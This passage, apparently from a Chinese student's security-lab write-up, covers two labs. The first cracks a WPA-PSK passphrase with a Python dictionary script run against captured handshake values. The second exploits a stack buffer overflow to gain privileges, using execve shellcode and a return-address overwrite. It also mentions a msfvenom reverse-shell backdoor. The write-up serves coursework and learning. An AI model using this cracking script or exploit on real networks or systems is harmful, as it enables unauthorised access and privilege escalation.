<h3 id="实验要求"><a href="#实验要求" class="headerlink" title="实验要求"></a>实验要求</h3><ul>
<li>配置无线网络攻击环境</li>
<li>抓取无线网络握手包</li>
<li>编写程序破解 WPA-PSK 的口令</li>
</ul>
<h3 id="实验原理-1"><a href="#实验原理-1" class="headerlink" title="实验原理"></a>实验原理</h3><p>WiFi supplication 的 4-way 挥手</p>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014433750.png" alt="image-20241224014433750" style="zoom:33%;" />

<p>本实验主要用到 4-way 握手的原理。4-way 握手是在客户端（STA，Station）和接入点（AP，Access Point）之间建立安全连接的一个关键步骤，它用于在客户端和AP之间生成加密会话密钥，以保护通信内容。</p>
<p>在 4-way 握手之前，STA 应该收到AP广播的 beacon 帧。AP 通过广播 beacon 帧来表示其无线网络的存在。<strong>这个帧是无线网络中的“标志”，让附近的设备知道这个网络的存在，并提供网络的基本信息，比如SSID（网络名称）、支持的加密方式、频率等。</strong></p>
<p>整个4-way握手的步骤如下：</p>
<ol>
<li><p><strong>Message 1</strong></p>
<p>AP生成一个随机数（称为Nonce）并发送给STA。这个消息告诉STA，它可以开始生成加密密钥。</p>
</li>
<li><p><strong>Message 2</strong></p>
<p>STA接收到AP的Nonce后，也生成一个随机数（称为STA Nonce），并使用这个随机数以及预共享密钥（PSK）和AP的Nonce一起计算出会话密钥。然后STA会将自己的Nonce发送给AP。</p>
</li>
<li><p><strong>Message 3</strong></p>
<p>AP接收到STA的Nonce后，使用双方的Nonce和PSK计算会话密钥。AP还会计算一个MIC（消息完整性检查码）来确保数据的完整性，然后将该信息发送给STA。</p>
</li>
<li><p><strong>Message 4</strong></p>
<p>STA验证接收到的MIC后，确认会话密钥已成功生成并通知AP，双方都可以开始使用这个会话密钥加密通信了。</p>
</li>
</ol>
<h3 id="实验内容-2"><a href="#实验内容-2" class="headerlink" title="实验内容"></a>实验内容</h3><aside> 👿

<p>使用抓取好的 wireshark 包</p>
</aside>

<ol>
<li>查看 beacon frame 查看 <code>SSID</code> 为  dd-wrt (64642d77727432)</li>
</ol>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014410603.png" alt="image-20241224014410603" style="zoom:33%;" />

<ol>
<li>查看 message 1 获取 <code>ANounce</code> 为 <code>5f5502ba400cd7827ad3db093b855ca0f595f77b1dccc42977e9dea9c2e1d412</code></li>
</ol>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014450413.png" alt="image-20241224014450413" style="zoom:33%;" />

<ol>
<li>查看 message 2 获取<ol>
<li><code>SNonce</code> 为 <code>fd5626a59688a6da5bb338d6595b4995ed9342de1f15be7281b3fee6a8db9130</code></li>
<li><code>DATA1</code> 为  <code>01 03 00 75 02 01 0a 00 00 00 00 00 00 00 00 00 01 fd 56 26 a5 96 88 a6 da 5b b3 38 d6 59 5b 49 95 ed 93 42 de 1f 15 be 72 81 b3 fe e6 a8 db 91 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b dd 55 55 3f 0b d9 ad 4c 78 11 22 00 e4 48 6b 00 16 30 14 01 00 00 0f ac 02 01 00 00 0f ac 04 01 00 00 0f ac 02 00 00</code></li>
<li><code>MIC1</code> 为 <code>7bdd55553f0bd9ad4c78112200e4486b</code></li>
</ol>
</li>
</ol>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014508178.png" alt="image-20241224014508178" style="zoom:33%;" />

<ol>
<li>查看 message 3 获取<ol>
<li><code>MIC2</code> 为 <code>e60f0dfe5ea596c513f92a24961efe75</code></li>
<li><code>DATA2</code> 为<code>010300af0213ca001000000000000000025f5502ba400cd7827ad3db093b855ca0f595f77b1dccc42977e9dea9c2e1d412520ddd5be7ecc1ecb026276e0e41aaeafc000000000000000000000000000000e60f0dfe5ea596c513f92a24961efe7500502c8d27f09d60467190ac5f9ce0069669b3f7ad5eb4be68f27481dec2e688d1541a1c28256f373208482711afdd931a44eb66fac73881267af8d345f07d63e16d33a6c56e35d26e98432997bc4a87faa2</code></li>
</ol>
</li>
</ol>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014517715.png" alt="image-20241224014517715" style="zoom:33%;" />

<ol>
<li>查看 message 4 获取<ol>
<li><code>MIC3</code> 为 <code>f2be18f46a6903a554c002ce4dd7eb54</code></li>
<li><code>DATA3</code> 为 <code>0103005f02030a0000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f2be18f46a6903a554c002ce4dd7eb540000</code></li>
</ol>
</li>
<li>编写程序破解 WPA-PSK 的口令</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> a2b_hex</span><br><span class="line"></span><br><span class="line"><span class="comment"># 必要数据</span></span><br><span class="line">SSID = <span class="string">&quot;dd-wrt&quot;</span>  <span class="comment"># 网络名称</span></span><br><span class="line">ANonce = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;5f5502ba400cd7827ad3db093b855ca0f595f77b1dccc42977e9dea9c2e1d412&quot;</span>)  <span class="comment"># ANonce</span></span><br><span class="line">SNonce = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;fd5626a59688a6da5bb338d6595b4995ed9342de1f15be7281b3fee6a8db9130&quot;</span>)  <span class="comment"># SNonce</span></span><br><span class="line">AP_MAC = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;0018f8f5c2c6&quot;</span>)  <span class="comment"># AP MAC 地址</span></span><br><span class="line">Client_MAC = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;00259c749592&quot;</span>)  <span class="comment"># Client MAC 地址</span></span><br><span class="line">DATA1 = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;0103007502010a00000000000000000001fd5626a59688a6da5bb338d6595b4995ed9342de1f15be7281b3fee6a8db913000000000000000000000000000000000000000000000000000000000000000007bdd55553f0bd9ad4c78112200e4486b001630140100000fac020100000fac040100000fac020000&quot;</span>)</span><br><span class="line">MIC1 = <span class="built_in">bytes</span>.fromhex(<span class="string">&quot;7bdd55553f0bd9ad4c78112200e4486b&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 字典文件路径</span></span><br><span class="line">dictionary_file = <span class="string">&quot;pwd-dictionary2.txt&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">calculate_pmk</span>(<span class="params">psk, ssid</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    计算 PMK (Pairwise Master Key)</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    pmk = hashlib.pbkdf2_hmac(<span class="string">&#x27;sha1&#x27;</span>, psk.encode(<span class="string">&#x27;utf-8&#x27;</span>), ssid.encode(<span class="string">&#x27;utf-8&#x27;</span>), <span class="number">4096</span>, <span class="number">32</span>)</span><br><span class="line">    <span class="keyword">return</span> pmk</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">calculate_ptk</span>(<span class="params">pmk, anonce, snonce, ap_mac, client_mac</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    计算 PTK (Pairwise Transient Key)</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    pke = <span class="string">b&quot;Pairwise key expansion&quot;</span> + \\</span><br><span class="line">          <span class="built_in">min</span>(ap_mac, client_mac) + <span class="built_in">max</span>(ap_mac, client_mac) + \\</span><br><span class="line">          <span class="built_in">min</span>(anonce, snonce) + <span class="built_in">max</span>(anonce, snonce)</span><br><span class="line">    ptk = hmac.new(pmk, pke, hashlib.sha1).digest()</span><br><span class="line">    <span class="keyword">return</span> ptk[:<span class="number">16</span>]  <span class="comment"># 取前16字节用于 MIC 计算</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">calculate_mic</span>(<span class="params">ptk, data</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    使用 PTK 计算 MIC</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    mic = hmac.new(ptk, data, hashlib.sha1).digest()[:<span class="number">16</span>]</span><br><span class="line">    <span class="keyword">return</span> mic</span><br><span class="line"></span><br><span class="line"><span class="comment"># 打开字典文件进行弱口令爆破</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(dictionary_file, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">for</span> password <span class="keyword">in</span> f:</span><br><span class="line">        password = password.strip()</span><br><span class="line">        <span class="comment"># 计算 PMK</span></span><br><span class="line">        pmk = calculate_pmk(password, SSID)</span><br><span class="line">        <span class="comment"># 计算 PTK</span></span><br><span class="line">        ptk = calculate_ptk(pmk, ANonce, SNonce, AP_MAC, Client_MAC)</span><br><span class="line">        <span class="comment"># 计算 MIC</span></span><br><span class="line">        mic = calculate_mic(ptk, DATA1)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 比较 MIC 值</span></span><br><span class="line">        <span class="keyword">if</span> mic == MIC1:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;[+] 密码找到: <span class="subst">&#123;password&#125;</span>&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[-] 密码未找到，请尝试其他字典或方法。&quot;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="实验三-缓冲区溢出实验"><a href="#实验三-缓冲区溢出实验" class="headerlink" title="实验三 - 缓冲区溢出实验"></a>实验三 - 缓冲区溢出实验</h2><h3 id="实验要求-1"><a href="#实验要求-1" class="headerlink" title="实验要求"></a>实验要求</h3><ul>
<li>编写程序测试Shellcode</li>
<li>通过栈缓冲区溢出进行提权</li>
<li>提升难度的栈缓冲区溢出提权</li>
</ul>
<h3 id="实验原理-2"><a href="#实验原理-2" class="headerlink" title="实验原理"></a>实验原理</h3><p>缓冲区溢出是指程序试图写入超出预分配范围的数据的条件固定长度的缓冲区的漏洞。恶意用户可以使用此漏洞来更改程序的流控制，导致执行恶意代码。此漏洞是由于用于数据（例如缓冲区）和用于控件的存储（例如返回地址）混合存储引起的：数据部分中的溢出会因为溢出会更改返回地址，所以会影响程序的控制流程。</p>
<h3 id="实验内容-3"><a href="#实验内容-3" class="headerlink" title="实验内容"></a>实验内容</h3><h4 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h4><p>vm 装不上 seed，直接用标准的 ubuntu 进行实验。</p>
<hr>
<ul>
<li>查看地址空间随机化设置情况</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/sys/kernel/randomize_va_space</span><br></pre></td></tr></table></figure>

<p>0 表示无随机化，1 表示保守随机，2 表示完全随机化</p>
<p>关闭地址空间随机化 <code>sudo sysctl -w kernel.randomize_va_space=0</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014536067.png" alt="image-20241224014536067"></p>
<ul>
<li>修改 &#x2F;bin&#x2F;sh 连接</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ln -sf /bin/zsh /bin/sh</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014546235.png" alt="image-20241224014546235"></p>
<h4 id="编写程序测试-shellcode"><a href="#编写程序测试-shellcode" class="headerlink" title="编写程序测试 shellcode"></a>编写程序测试 shellcode</h4><ul>
<li>用 msfvenom 生成 shellcod</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014558703.png" alt="image-20241224014558703"></p>
<ul>
<li><p>编写 C 程序调用所生成的 shellcod</p>
</li>
<li><p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014616708.png" alt="image-20241224014616708">msf 打开侦听服务，接收来自后门的 reverse shell 连接</p>
</li>
<li><p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014626769.png" alt="image-20241224014626769">目标机连接</p>
</li>
</ul>
<h4 id="通过栈缓冲区溢出进行提权"><a href="#通过栈缓冲区溢出进行提权" class="headerlink" title="通过栈缓冲区溢出进行提权"></a>通过栈缓冲区溢出进行提权</h4><ul>
<li>编译目标程序</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Vunlerable program: stack.c */</span></span><br><span class="line"><span class="comment">/* You can get this program from the lab&#x27;s website */</span></span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line"><span class="comment">/* Changing this size will change the layout of the stack.</span></span><br><span class="line"><span class="comment">* Instructors can change this value each year, so students</span></span><br><span class="line"><span class="comment">* won&#x27;t be able to use the solutions from the past.</span></span><br><span class="line"><span class="comment">* Suggested value: between 0 and 400 */</span></span><br><span class="line">#ifndef BUF_SIZE</span><br><span class="line">#define BUF_SIZE <span class="number">24</span></span><br><span class="line">#endif</span><br><span class="line"><span class="type">int</span> <span class="title function_">bof</span><span class="params">(<span class="type">char</span> *str)</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="type">char</span> buffer[BUF_SIZE];</span><br><span class="line"><span class="comment">/* The following statement has a buffer overflow problem */</span></span><br><span class="line">strcpy(buffer, str);</span><br><span class="line"><span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="type">char</span> str[<span class="number">517</span>];</span><br><span class="line">FILE *badfile;</span><br><span class="line"><span class="comment">/* Change the size of the dummy array to randomize the parameters</span></span><br><span class="line"><span class="comment">for this lab. Need to use the array at least once */</span></span><br><span class="line"><span class="type">char</span> dummy[BUF_SIZE]; memset(dummy, <span class="number">0</span>, BUF_SIZE);</span><br><span class="line">badfile = fopen(<span class="string">&quot;badfile&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line">fread(str, sizeof(<span class="type">char</span>), <span class="number">517</span>, badfile);</span><br><span class="line">bof(str);</span><br><span class="line">printf(<span class="string">&quot;Returned Properly\\n&quot;</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line">gcc -m32 -o test2 -z execstack -fno-stack-protector test2.c</span><br></pre></td></tr></table></figure>

<ul>
<li>gdb 分析，反汇编</li>
</ul>
<p>或者直接拖到 ida 中 进行分析然后编写利用程序进行提权。确定str在内存中的位置&#x3D;ebp-0x211。return地址&#x3D;buffer地址+0x20+0x04</p>
<ul>
<li>攻击程序</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* test2.c  */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* A program that creates a file containing code for launching shell*/</span></span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line"><span class="type">char</span> shellcode[]=</span><br><span class="line">    <span class="string">&quot;\\x31\\xc0&quot;</span>             <span class="comment">/* xorl    %eax,%eax              */</span></span><br><span class="line">    <span class="string">&quot;\\x50&quot;</span>                 <span class="comment">/* pushl   %eax                   */</span></span><br><span class="line">    <span class="string">&quot;\\x68&quot;</span><span class="string">&quot;//sh&quot;</span>           <span class="comment">/* pushl   $0x68732f2f            */</span></span><br><span class="line">    <span class="string">&quot;\\x68&quot;</span><span class="string">&quot;/bin&quot;</span>           <span class="comment">/* pushl   $0x6e69622f            */</span></span><br><span class="line">    <span class="string">&quot;\\x89\\xe3&quot;</span>             <span class="comment">/* movl    %esp,%ebx              */</span></span><br><span class="line">    <span class="string">&quot;\\x50&quot;</span>                 <span class="comment">/* pushl   %eax                   */</span></span><br><span class="line">    <span class="string">&quot;\\x53&quot;</span>                 <span class="comment">/* pushl   %ebx                   */</span></span><br><span class="line">    <span class="string">&quot;\\x89\\xe1&quot;</span>             <span class="comment">/* movl    %esp,%ecx              */</span></span><br><span class="line">    <span class="string">&quot;\\x99&quot;</span>                 <span class="comment">/* cdq                            */</span></span><br><span class="line">    <span class="string">&quot;\\xb0\\x0b&quot;</span>             <span class="comment">/* movb    $0x0b,%al              */</span></span><br><span class="line">    <span class="string">&quot;\\xcd\\x80&quot;</span>             <span class="comment">/* int     $0x80                  */</span></span><br><span class="line">;</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">517</span>];</span><br><span class="line">    FILE *badfile;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Initialize buffer with 0x90 (NOP instruction) */</span></span><br><span class="line">    memset(&amp;buffer, <span class="number">0x90</span>, <span class="number">517</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* You need to fill the buffer with appropriate contents here */</span> </span><br><span class="line">    </span><br><span class="line">    <span class="comment">//strcpy(buffer,&quot;123456&quot;);</span></span><br><span class="line">    strcpy(buffer+<span class="number">36</span>,<span class="string">&quot;\\x5b\\xeb\\xff\\xbf&quot;</span>);<span class="comment">//覆盖bof返回地址</span></span><br><span class="line">    strcpy(buffer+<span class="number">100</span>,shellcode);<span class="comment">//在buffer+100处写入攻击代码</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Save the contents to the file &quot;badfile&quot; */</span></span><br><span class="line">    badfile = fopen(<span class="string">&quot;./badfile&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line">    fwrite(buffer, <span class="number">517</span>, <span class="number">1</span>, badfile);</span><br><span class="line">    fclose(badfile);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Article</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Apache"><span class="toc-number">1.1.</span> <span class="toc-text">Apache</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E6%A6%82%E5%BF%B5%E5%92%8C%E7%89%B9%E7%82%B9"><span class="toc-number">1.1.1.</span> <span class="toc-text">核心概念和特点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A8%A1%E5%9D%97"><span class="toc-number">1.1.2.</span> <span class="toc-text">模块</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE-apache-HTTP-server"><span class="toc-number">1.1.3.</span> <span class="toc-text">配置 apache HTTP server</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%B8%80-TLS-%E9%85%8D%E7%BD%AE%E4%B8%8E%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">实验一 - TLS 配置与流量分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9"><span class="toc-number">2.1.</span> <span class="toc-text">实验内容</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86"><span class="toc-number">2.2.</span> <span class="toc-text">实验原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#TLS-%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.2.1.</span> <span class="toc-text">TLS 协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#OpenSSL"><span class="toc-number">2.2.2.</span> <span class="toc-text">OpenSSL</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Diffie-Hellman%EF%BC%88DH%EF%BC%89"><span class="toc-number">2.2.3.</span> <span class="toc-text">Diffie-Hellman（DH）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-1"><span class="toc-number">2.3.</span> <span class="toc-text">实验内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-number">2.3.1.</span> <span class="toc-text">环境配置</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%BA%8C-WPA-PSK-%E5%8F%A3%E4%BB%A4%E6%94%BB%E5%87%BB"><span class="toc-number">3.</span> <span class="toc-text">实验二 - WPA-PSK 口令攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E8%A6%81%E6%B1%82"><span class="toc-number">3.1.</span> <span class="toc-text">实验要求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86-1"><span class="toc-number">3.2.</span> <span class="toc-text">实验原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-2"><span class="toc-number">3.3.</span> <span class="toc-text">实验内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%B8%89-%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E5%AE%9E%E9%AA%8C"><span class="toc-number">4.</span> <span class="toc-text">实验三 - 缓冲区溢出实验</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E8%A6%81%E6%B1%82-1"><span class="toc-number">4.1.</span> <span class="toc-text">实验要求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86-2"><span class="toc-number">4.2.</span> <span class="toc-text">实验原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-3"><span class="toc-number">4.3.</span> <span class="toc-text">实验内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">4.3.1.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BC%96%E5%86%99%E7%A8%8B%E5%BA%8F%E6%B5%8B%E8%AF%95-shellcode"><span class="toc-number">4.3.2.</span> <span class="toc-text">编写程序测试 shellcode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83"><span class="toc-number">4.3.3.</span> <span class="toc-text">通过栈缓冲区溢出进行提权</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&text=网络安全攻防实验"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&is_video=false&description=网络安全攻防实验"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网络安全攻防实验&body=Check out this article: http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
